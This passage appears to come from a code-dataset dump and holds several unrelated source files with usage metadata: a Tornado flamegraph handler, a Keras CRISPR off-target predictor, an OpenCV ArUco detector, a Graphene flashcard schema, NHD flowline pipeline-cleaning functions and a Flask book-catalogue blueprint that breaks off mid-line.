"line_number": 32, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 59, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.CHILD_ACTION", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 59, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 68, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 68, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 68, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 75, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 75, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 82, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 82, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 82, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 89, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.DN", "line_number": 89, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 89, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 97, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 97, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 97, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 103, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 103, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 103, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 109, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 109, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 109, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 117, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 117, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 117, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 130, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 130, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 139, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 139, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 139, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 146, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.RN", "line_number": 146, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 146, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 154, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", 
"line_number": 154, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 154, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 160, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.REGULAR", "line_number": 160, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 160, "usage_type": "name"}, {"api_name": "cobra.mit.meta.PropMeta", "line_number": 177, "usage_type": "call"}, {"api_name": "cobra.model.category.PropCategory.STATUS", "line_number": 177, "usage_type": "attribute"}, {"api_name": "cobra.model.category.PropCategory", "line_number": 177, "usage_type": "name"}, {"api_name": "cobra.mit.mo.Mo.__init__", "line_number": 191, "usage_type": "call"}, {"api_name": "cobra.mit.mo.Mo", "line_number": 191, "usage_type": "name"}]}
+{"seq_id": "619091398", "text": "from typing import TYPE_CHECKING\n\nfrom tornado.web import RequestHandler\n\nfrom grouper.models.base.session import Session\nfrom grouper.perf_profile import FLAMEGRAPH_SUPPORTED, get_flamegraph_svg, InvalidUUID\n\nif TYPE_CHECKING:\n from typing import Any\n\n\n# Don't use GrouperHandler here as we don't want to count these as requests.\nclass PerfProfile(RequestHandler):\n def get(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n trace_uuid = kwargs[\"trace_uuid\"] # type: str\n if not FLAMEGRAPH_SUPPORTED:\n return self.send_error(\n status_code=404,\n reason=\"Performance profiles not supported (plop or pyflamegraph not installed)\",\n )\n\n try:\n flamegraph_svg = get_flamegraph_svg(Session(), trace_uuid)\n except InvalidUUID:\n pass\n else:\n self.set_header(\"Content-Type\", \"image/svg+xml\")\n self.write(flamegraph_svg)\n", "sub_path": "grouper/fe/handlers/perf_profile.py", "file_name": "perf_profile.py", "file_ext": "py", "file_size_in_byte": 960, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 8, "usage_type": "name"}, {"api_name": "tornado.web.RequestHandler", "line_number": 13, "usage_type": "name"}, {"api_name": "grouper.perf_profile.FLAMEGRAPH_SUPPORTED", "line_number": 17, "usage_type": "name"}, {"api_name": "grouper.perf_profile.get_flamegraph_svg", "line_number": 24, "usage_type": "call"}, {"api_name": "grouper.models.base.session.Session", "line_number": 24, "usage_type": "call"}, {"api_name": "grouper.perf_profile.InvalidUUID", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "266964911", "text": "# -*- coding:utf-8 -*-\r\n\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\nimport keras\r\nfrom keras.initializers import RandomUniform\r\nfrom keras.layers import multiply\r\nfrom keras.layers.core import Reshape, Permute\r\nfrom keras.layers import BatchNormalization, Activation\r\nfrom keras.layers.core import Dense, Dropout, Lambda, Flatten\r\nfrom keras.layers.convolutional import Conv1D\r\nfrom keras.layers.embeddings import Embedding\r\nfrom keras.models import *\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\ndef attention(x, g, TIME_STEPS):\r\n \"\"\"\r\n inputs.shape = (batch_size, time_steps, input_dim)\r\n \"\"\"\r\n input_dim = int(x.shape[2])\r\n x1 = K.permute_dimensions(x, (0, 2, 1))\r\n g1 = K.permute_dimensions(g, (0, 2, 1))\r\n\r\n x2 = Reshape((input_dim, TIME_STEPS))(x1)\r\n g2 = Reshape((input_dim, TIME_STEPS))(g1)\r\n\r\n x3 = Dense(TIME_STEPS, kernel_initializer=RandomUniform(seed=2020))(x2)\r\n g3 = Dense(TIME_STEPS, kernel_initializer=RandomUniform(seed=2020))(g2)\r\n x4 = keras.layers.add([x3, g3])\r\n a = Dense(TIME_STEPS, activation='softmax', use_bias=False)(x4)\r\n a_probs = Permute((2, 1))(a)\r\n output_attention_mul = multiply([x, a_probs])\r\n return output_attention_mul\r\n\r\n\r\ndef loadData(data_file):\r\n data_list, label, negative, positive = [], [], [], []\r\n with open(data_file) as f:\r\n for line in f:\r\n ll = [i for i in line.strip().split(',')]\r\n label_item = np.float(ll[2])\r\n data_item = [int(i) for i in ll[3:]]\r\n if label_item == 0.0:\r\n negative.append(ll)\r\n else:\r\n positive.append(ll)\r\n data_list.append(data_item)\r\n label.append(label_item)\r\n return negative, positive, label\r\n\r\n\r\nVOCAB_SIZE = 16\r\nEMBED_SIZE = 90\r\nBATCH_SIZE = 256\r\nMAXLEN = 23\r\n\r\nnegative, positive, label = loadData('data/test_off-target.txt')\r\n\r\npositive, negative = np.array(positive), np.array(negative)\r\n\r\ntrain_positive, test_positive = train_test_split(positive, test_size=0.2, random_state=42)\r\ntrain_negative, test_negative = train_test_split(negative, test_size=0.2, random_state=42)\r\n\r\nxtest = np.vstack((test_negative, test_positive))\r\nxtest = np.array(xtest)\r\n\r\n\r\ndef main():\r\n input = Input(shape=(23,))\r\n embedded = Embedding(VOCAB_SIZE, EMBED_SIZE, input_length=MAXLEN)(input)\r\n\r\n conv1 = Conv1D(20, 5, name=\"conv1\")(embedded)\r\n ac1 = Activation('relu')(conv1)\r\n B1 = BatchNormalization()(ac1)\r\n\r\n conv2 = Conv1D(40, 5, name=\"conv2\")(B1)\r\n ac2 = Activation('relu')(conv2)\r\n B2 = BatchNormalization()(ac2)\r\n\r\n conv3 = Conv1D(80, 5, name=\"conv3\")(B2)\r\n ac3 = Activation('relu')(conv3)\r\n B3 = BatchNormalization()(ac3)\r\n\r\n conv11 = Conv1D(80, 9, name=\"conv11\")(B1)\r\n x = Lambda(lambda x: attention(x[0], x[1], 11))([conv11, B3])\r\n\r\n flat = Flatten()(x)\r\n dense1 = Dense(40, name=\"dense1\")(flat)\r\n ac4 = Activation('relu')(dense1)\r\n drop1 = Dropout(0.2)(ac4)\r\n\r\n dense2 = Dense(20, name=\"dense2\")(drop1)\r\n ac5 = Activation('relu')(dense2)\r\n drop2 = Dropout(0.2)(ac5)\r\n\r\n dense3 = Dense(2, name=\"dense3\")(drop2)\r\n output = Activation('softmax')(dense3)\r\n\r\n model = Model(inputs=[input], outputs=[output])\r\n\r\n print(\"Loading weights for the models\")\r\n model.load_weights('weights/CRISPR-OFFT.h5')\r\n\r\n print(\"Predicting on test data\")\r\n y_pred = model.predict(xtest[:, 3:])\r\n print(y_pred)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": 
"CRISPR-OFFT.py", "file_name": "CRISPR-OFFT.py", "file_ext": "py", "file_size_in_byte": 3506, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.environ", "line_number": 4, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Reshape", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.core.Reshape", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.initializers.RandomUniform", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.initializers.RandomUniform", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.layers.add", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 32, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Dense", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.core.Permute", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.layers.multiply", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 64, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.layers.embeddings.Embedding", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv1D", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 77, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv1D", "line_number": 79, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 80, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv1D", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv1D", "line_number": 87, "usage_type": "call"}, {"api_name": "keras.layers.core.Lambda", "line_number": 88, "usage_type": "call"}, {"api_name": "keras.layers.core.Flatten", "line_number": 90, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 91, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 92, "usage_type": "call"}, {"api_name": "keras.layers.core.Dropout", "line_number": 93, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 95, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 96, "usage_type": "call"}, {"api_name": "keras.layers.core.Dropout", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 99, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "152101269", "text": "#!/usr/bin/env python\nimport cv2\nimport cv2.aruco as aruco\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nmarkerLength = 350\ncamera_matrix = np.asmatrix([[613.299988, 0.0, 354.949005],[0.0, 0.0, 612.106018],[214.380005, 0.0, 1.0]])\ndist_coeffs = (-0.439, 0.263, 0.001, 0.0, -0.113)\n \nwhile(True):\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)\n parameters = aruco.DetectorParameters_create()\n\n corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)\n if type(ids) != type(None):\n rvec,tvec,z = aruco.estimatePoseSingleMarkers(corners, markerLength, camera_matrix, dist_coeffs)\n #rvec, tvec = aruco.estimatePoseSingleMarkers(corners, markerLength, camera_matrix, dist_coeffs)\n imgWithAruco = aruco.drawDetectedMarkers(gray, corners, ids)\n imgWithAruco = aruco.drawAxis(imgWithAruco, camera_matrix, dist_coeffs, rvec, tvec, 100)\n cv2.imshow('frame',imgWithAruco)\n else:\n pass\n \n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n", "sub_path": "scripts/detect_aruco_markers.py", "file_name": "detect_aruco_markers.py", "file_ext": "py", "file_size_in_byte": 1207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cv2.VideoCapture", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.asmatrix", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.aruco.Dictionary_get", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 14, "usage_type": "name"}, {"api_name": "cv2.aruco.DICT_6X6_250", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.aruco.DetectorParameters_create", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 15, "usage_type": "name"}, {"api_name": "cv2.aruco.detectMarkers", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 17, "usage_type": "name"}, {"api_name": "cv2.aruco.estimatePoseSingleMarkers", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 19, "usage_type": "name"}, {"api_name": "cv2.aruco.drawDetectedMarkers", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 21, "usage_type": "name"}, {"api_name": "cv2.aruco.drawAxis", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 22, "usage_type": "name"}, {"api_name": "cv2.imshow", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "225613945", "text": "import graphene\nfrom django.contrib.contenttypes.models import ContentType\nfrom graphene_django import (DjangoObjectType, )\nfrom graphql import GraphQLError\n\n\nfrom . import models\n\n\nclass ContentObjectType(DjangoObjectType):\n class Meta:\n model = ContentType\n\n\nclass FlashcardType(DjangoObjectType):\n question = graphene.String()\n\n def resolve_question(self: models.Flashcard, info):\n return self.question_content\n\n class Meta:\n model = models.Flashcard\n\n\nclass FlashcardCollectionType(DjangoObjectType):\n class Meta:\n model = models.FlashcardCollection\n\n\nclass TagType(DjangoObjectType):\n class Meta:\n model = models.Tag\n\n\nclass CategoryType(DjangoObjectType):\n class Meta:\n model = models.Category\n\n\nclass TextType(DjangoObjectType):\n class Meta:\n model = models.Text\n\n\nclass Query(graphene.ObjectType):\n flashcards = graphene.List(FlashcardType)\n collections = graphene.List(FlashcardCollectionType)\n tags = graphene.List(TagType)\n categories = graphene.List(CategoryType)\n\n def resolve_flashcards(self, info, **kwargs):\n return models.Flashcard.objects.all()\n\n def resolve_collections(self, info, **kwargs):\n return models.FlashcardCollection.objects.all()\n\n def resolve_tags(self, info, **kwargs):\n return models.Tag.objects.all()\n\n def resolve_categories(self, info, **kwargs):\n return models.Category.objects.all()\n\n\nclass CreateTextFlashcard(graphene.Mutation):\n flashcard = graphene.Field(FlashcardType)\n\n class Arguments:\n question = graphene.String(required=True)\n answer = graphene.String(required=True)\n collection = graphene.Int(required=True)\n\n def mutate(self, info, question, answer, collection):\n flashcard = models.Flashcard.objects.create_text_flashcard(question=question,\n answer=answer,\n collection_id=collection)\n return CreateTextFlashcard(flashcard=flashcard)\n\n\nclass DeleteFlashcard(graphene.Mutation):\n flashcard_id = graphene.Int()\n\n class Arguments:\n flashcard_id = graphene.Int(required=True)\n\n def mutate(self, info, flashcard_id):\n flashcard = models.Flashcard.objects.get(id=flashcard_id)\n flashcard.delete()\n return DeleteFlashcard(flashcard_id=flashcard_id)\n\n\nclass Mutation(graphene.ObjectType):\n create_text_flashcard = CreateTextFlashcard.Field()\n delete_flashcard = DeleteFlashcard.Field()\n", "sub_path": "flashback/core/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 2573, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "graphene_django.DjangoObjectType", "line_number": 10, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 12, "usage_type": "name"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 15, "usage_type": "name"}, {"api_name": "graphene.String", "line_number": 16, "usage_type": "call"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 25, "usage_type": "name"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 30, "usage_type": "name"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 35, "usage_type": "name"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 40, "usage_type": "name"}, {"api_name": "graphene.ObjectType", "line_number": 45, "usage_type": "attribute"}, {"api_name": "graphene.List", "line_number": 46, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 47, "usage_type": "call"}, {"api_name": 
"graphene.List", "line_number": 48, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 49, "usage_type": "call"}, {"api_name": "graphene.Mutation", "line_number": 64, "usage_type": "attribute"}, {"api_name": "graphene.Field", "line_number": 65, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 68, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 69, "usage_type": "call"}, {"api_name": "graphene.Int", "line_number": 70, "usage_type": "call"}, {"api_name": "graphene.Mutation", "line_number": 79, "usage_type": "attribute"}, {"api_name": "graphene.Int", "line_number": 80, "usage_type": "call"}, {"api_name": "graphene.Int", "line_number": 83, "usage_type": "call"}, {"api_name": "graphene.ObjectType", "line_number": 91, "usage_type": "attribute"}]}
+{"seq_id": "112721262", "text": "from time import time\n\nimport pandas as pd\nimport geopandas as gp\nimport pygeos as pg\nimport numpy as np\nimport networkx as nx\n\nfrom nhdnet.nhd.joins import (\n index_joins,\n find_joins,\n find_join,\n create_upstream_index,\n remove_joins,\n)\n\n\ndef remove_flowlines(flowlines, joins, ids):\n \"\"\"Remove flowlines specified by ids from flowlines and joins\n\n\tParameters\n\t----------\n\tflowlines : GeoDataFrame\n\tjoins : DataFrame\n\t\tjoins between flowlines\n\tids : list-like\n\t\tlist of ids of flowlines to remove\n\n\tReturns\n\t-------\n\ttuple of (GeoDataFrame, DataFrame)\n\t\t(flowlines, joins)\n\t\"\"\"\n # drop from flowlines\n flowlines = flowlines.loc[~flowlines.NHDPlusID.isin(ids)].copy()\n\n # IDs are based on NHDPlusID, make sure to use correct columns for joins\n joins = remove_joins(\n joins, ids, downstream_col=\"downstream\", upstream_col=\"upstream\"\n )\n\n # update our ids to match zeroed out ids\n joins.loc[joins.downstream == 0, \"downstream_id\"] = 0\n joins.loc[joins.downstream == 0, \"type\"] = \"terminal\"\n joins.loc[joins.upstream == 0, \"upstream_id\"] = 0\n\n return flowlines, joins\n\n\ndef remove_pipelines(flowlines, joins, max_pipeline_length=100):\n \"\"\"Remove pipelines that are above max length,\n\tbased on contiguous length of pipeline segments.\n\n\tParameters\n\t----------\n\tflowlines : GeoDataFrame\n\tjoins : DataFrame\n\t\tjoins between flowlines\n\tmax_pipeline_length : int, optional (default: 100)\n\t\tlength above which pipelines are dropped\n\n\tReturns\n\t-------\n\ttuple of (GeoDataFrame, DataFrame)\n\t\t(flowlines, joins)\n\t\"\"\"\n\n start = time()\n pids = flowlines.loc[flowlines.FType == 428].index\n pjoins = find_joins(\n joins, pids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )[[\"downstream_id\", \"upstream_id\"]]\n print(\n \"Found {:,} pipelines and {:,} pipeline-related joins\".format(\n len(pids), len(pjoins)\n )\n )\n\n # Drop any isolated pipelines no matter what size\n # these either are one segment long, or are upstream / downstream terminals for\n # non-pipeline segments\n join_idx = index_joins(\n pjoins, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n drop_ids = join_idx.loc[\n (\n join_idx.upstream_id == join_idx.downstream_id\n ) # has upstream and downstream of 0s\n | (\n ((join_idx.upstream_id == 0) & (~join_idx.downstream_id.isin(pids)))\n | ((join_idx.downstream_id == 0) & (~join_idx.upstream_id.isin(pids)))\n )\n ].index\n print(\"Removing {:,} isolated segments\".format(len(drop_ids)))\n\n # remove from flowlines, joins, pjoins\n flowlines = flowlines.loc[~flowlines.index.isin(drop_ids)].copy()\n joins = remove_joins(\n joins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n pjoins = remove_joins(\n pjoins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n join_idx = join_idx.loc[~join_idx.index.isin(drop_ids)].copy()\n\n # Find single connectors between non-pipeline segments\n # drop those > max_pipeline_length\n singles = join_idx.loc[\n ~(join_idx.upstream_id.isin(pids) | join_idx.downstream_id.isin(pids))\n ].join(flowlines[\"length\"])\n drop_ids = singles.loc[singles.length >= max_pipeline_length].index\n\n print(\n \"Found {:,} pipeline segments between flowlines that are > {:,}m; they will be dropped\".format(\n len(drop_ids), max_pipeline_length\n )\n )\n\n # remove from flowlines, joins, pjoins\n flowlines = 
flowlines.loc[~flowlines.index.isin(drop_ids)].copy()\n joins = remove_joins(\n joins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n pjoins = remove_joins(\n pjoins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n join_idx = join_idx.loc[~join_idx.index.isin(drop_ids)].copy()\n\n ### create a network of pipelines to group them together\n # Only use contiguous pipelines; those that are not contiguous should have been handled above\n nodes = pjoins.loc[pjoins.upstream_id.isin(pids) & pjoins.downstream_id.isin(pids)]\n network = nx.from_pandas_edgelist(nodes, \"downstream_id\", \"upstream_id\")\n components = pd.Series(nx.connected_components(network)).apply(list)\n\n groups = (\n pd.DataFrame(components.explode().rename(\"lineID\"))\n .reset_index()\n .rename(columns={\"index\": \"group\"})\n )\n groups = groups.join(flowlines[[\"length\"]], on=\"lineID\")\n stats = groups.groupby(\"group\").agg({\"length\": \"sum\"})\n drop_groups = stats.loc[stats.length >= max_pipeline_length].index\n drop_ids = groups.loc[groups.group.isin(drop_groups)].lineID\n\n print(\n \"Dropping {:,} pipelines that are greater than {:,}\".format(\n len(drop_ids), max_pipeline_length\n )\n )\n\n flowlines = flowlines.loc[~flowlines.index.isin(drop_ids)].copy()\n joins = remove_joins(\n joins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n\n # update NHDPlusIDs to match zeroed out ids\n # joins.loc[joins.downstream_id == 0, \"downstream\"] = 0\n joins.loc[\n (joins.downstream_id == 0) & (joins.type == \"internal\"), \"type\"\n ] = \"former_pipeline_join\"\n # joins.loc[joins.upstream_id == 0, \"upstream\"] = 0\n\n print(\"Done processing pipelines in {:.2f}s\".format(time() - start))\n\n return flowlines, joins\n\n\n# pygeos version of nhdnet.geometry.lines::calculate_sinuosity\ndef calculate_sinuosity(geometries):\n \"\"\"Calculate sinuosity of the line.\n\n This is the length of the line divided by the distance between the endpoints of the line.\n By definition, it is always >=1.\n\n Parameters\n ----------\n geometries : Series or ndarray of pygeos geometries\n\n Returns\n -------\n Series or ndarray\n sinuosity values\n \"\"\"\n\n # By definition, sinuosity should not be less than 1\n first = pg.get_point(geometries, 0)\n last = pg.get_point(geometries, -1)\n straight_line_distance = pg.distance(first, last)\n\n sinuosity = np.ones((len(geometries),)).astype(\"float32\")\n\n # if there is no straight line distance there can be no sinuosity\n ix = straight_line_distance > 0\n\n # by definition, all values must be at least 1, so clip lower bound\n sinuosity[ix] = (pg.length(geometries[ix]) / straight_line_distance).clip(1)\n\n if isinstance(geometries, pd.Series):\n return pd.Series(sinuosity, index=geometries.index)\n\n return sinuosity\n", "sub_path": "analysis/prep/network/lib/lines.py", "file_name": "lines.py", "file_ext": "py", "file_size_in_byte": 6521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 68, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.find_joins", "line_number": 70, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.index_joins", "line_number": 82, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 98, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", 
"line_number": 101, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 121, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 124, "usage_type": "call"}, {"api_name": "networkx.from_pandas_edgelist", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 133, "usage_type": "call"}, {"api_name": "networkx.connected_components", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 136, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 152, "usage_type": "call"}, {"api_name": "time.time", "line_number": 163, "usage_type": "call"}, {"api_name": "pygeos.get_point", "line_number": 186, "usage_type": "call"}, {"api_name": "pygeos.get_point", "line_number": 187, "usage_type": "call"}, {"api_name": "pygeos.distance", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 190, "usage_type": "call"}, {"api_name": "pygeos.length", "line_number": 196, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 199, "usage_type": "call"}]}
+{"seq_id": "372031261", "text": "from flask import (\r\n Blueprint, render_template, request, redirect, url_for\r\n)\r\nfrom web.bookdb import get_db \r\nfrom web.files import save_img, write_file\r\n\r\nbp = Blueprint('books', __name__) #'authors'から書き換える\r\n\r\n@bp.route('/books', methods=['GET'])\r\ndef all():\r\n db=get_db()\r\n alldata = db.execute('SELECT * FROM books').fetchall()\r\n return render_template('books/all.html', books=alldata)\r\n\r\n@bp.route('/books/new', methods=['GET', 'POST'])\r\ndef new():\r\n db = get_db() #GETでもPOSTでもデータベースを使う\r\n if request.method == 'POST':\r\n title = request.form['title']\r\n author = request.form['author']\r\n db.execute(\r\n \"INSERT INTO books (title, author) VALUES (?, ?)\",\r\n (title, author) #coverは初期値を用いる\r\n )\r\n db.commit() \r\n return redirect(url_for('books.all'))\r\n #GETの場合、著者の集合authorsを渡す\r\n authors = db.execute('SELECT * FROM authors').fetchall()\r\n return render_template('books/new.html', authors=authors)\r\n\r\n@bp.route('/books/show/', methods=['GET'])\r\ndef show(book_id):\r\n db=get_db()\r\n book = db.execute('SELECT * FROM books where id=?', book_id).fetchone()\r\n return render_template('books/show.html', book=book)\r\n\r\n@bp.route('/books/upload/', methods=['GET', 'POST'])\r\ndef upload(book_id):\r\n db=get_db()\r\n if request.method == 'POST':\r\n if 'file' in request.files: #リクエストにファイル情報が含まれていたら\r\n file = request.files['file']\r\n save_img(file) #files.pyで定義したメソッド\r\n db.execute( #表booksでのファイル名を初期値から固有値に変更\r\n \"UPDATE books SET cover=? where id=?\",\r\n (file.filename, book_id)\r\n )\r\n db.commit()\r\n \r\n #ファイルのアップロードに失敗したときの処置\r\n return redirect(url_for('books.show',book_id=book_id) )\r\n\r\n #GETで読み込まれた時 \r\n book = db.execute('SELECT * FROM books where id=?', book_id).fetchone()\r\n return render_template('books/upload.html', book=book)\r\n\r\n@bp.route('/books/write', methods=['GET'])\r\ndef write():\r\n cvs_str=\"\"\r\n db=get_db()\r\n alldata = db.execute('SELECT * FROM books').fetchall()\r\n for data in alldata:\r\n cvs_str += \",\".join([data['title'],data['author'],data['cover']])\r\n cvs_str += 